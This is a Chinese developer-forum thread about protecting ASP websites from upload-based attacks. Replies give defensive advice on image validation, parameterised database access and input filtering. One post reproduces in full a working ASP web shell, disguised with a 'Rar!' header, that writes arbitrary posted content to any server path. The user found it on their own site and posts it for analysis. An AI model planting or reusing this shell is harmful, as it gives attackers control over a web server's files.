28,408
社区成员
发帖
与我相关
我的任务
分享ASP做的网站怎么防止黑客攻击?
感觉ASP写的网站,漏洞很多。
上传功能时常被利用,黑客可以很容易的上传脚本,在网站上挂广告。
大家都来说说怎么用ASP写出安全的网站呢?
上传功能时常被利用,黑客可以很容易的上传脚本,在网站上挂广告。
大家都来说说怎么用ASP写出安全的网站呢?
...全文
请发表友善的回复…
发表回复
xinbingo 2011-11-10
- 打赏
- 举报
ASP基本上还是安全的
hookee 2011-11-10
- 打赏
- 举报
1 上传图片时,先用图像组件读取图片(读不出显然不是图片),再保存图片(即便在图片中包含脚本,也会被过滤掉)
2 正则检查递交的数据的类型、长度、特征。不要用sql拼接,用ADO对象读写数据库(即便包含非法sql字符也不需要手动处理)
3 用MVC框架写asp, 关键代码、配置、上传目录都可以保存在web目录之外。
ASP基本上还是安全的
2 正则检查递交的数据的类型、长度、特征。不要用sql拼接,用ADO对象读写数据库(即便包含非法sql字符也不需要手动处理)
3 用MVC框架写asp, 关键代码、配置、上传目录都可以保存在web目录之外。
ASP基本上还是安全的
hefeng_aspnet 2011-11-10
- 打赏
- 举报
创建文件 并写入内容
I_code 2011-11-10
- 打赏
- 举报
我维护的网站时常被挂广告。
贴个黑客上传上来的脚本,各位大侠帮我看看这脚本的作用
贴个黑客上传上来的脚本,各位大侠帮我看看这脚本的作用
<Title></Title>
Rar!
<%Dim objfSo%>
<%Dim fdata%>
<%Dim objCountFile%>
<%on error resume next%>
<%Set objfSo = Server.CreateObject("Scripting.fileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%if err =0 then%>
OK!</font>
<%else%>
NO!</font>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<form action='' method=pOsT>
PATH:</font><br>
<input type=text name=syfdpath width=32 value="<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>" style="border:solid 1px" size=40><br>
GUT:<br>
<textarea name=cyfddata cols=39 rows=10 width=80 style="border:solid 1px"></textarea>
<br><input type=submit value=SAVE style="border:solid 1px">
</form>
hefeng_aspnet 2011-11-10
- 打赏
- 举报
木头是猫 2011-11-10
- 打赏
- 举报
比如:
上传功能加上权限,加上文件判断 简单的是扩展名判断 深一点就判断文件头
一些request都加上判断和过滤,只能数字的就必须是数字 如果是字符串的就必须过滤或替换掉一些非法字符
上传功能加上权限,加上文件判断 简单的是扩展名判断 深一点就判断文件头
一些request都加上判断和过滤,只能数字的就必须是数字 如果是字符串的就必须过滤或替换掉一些非法字符
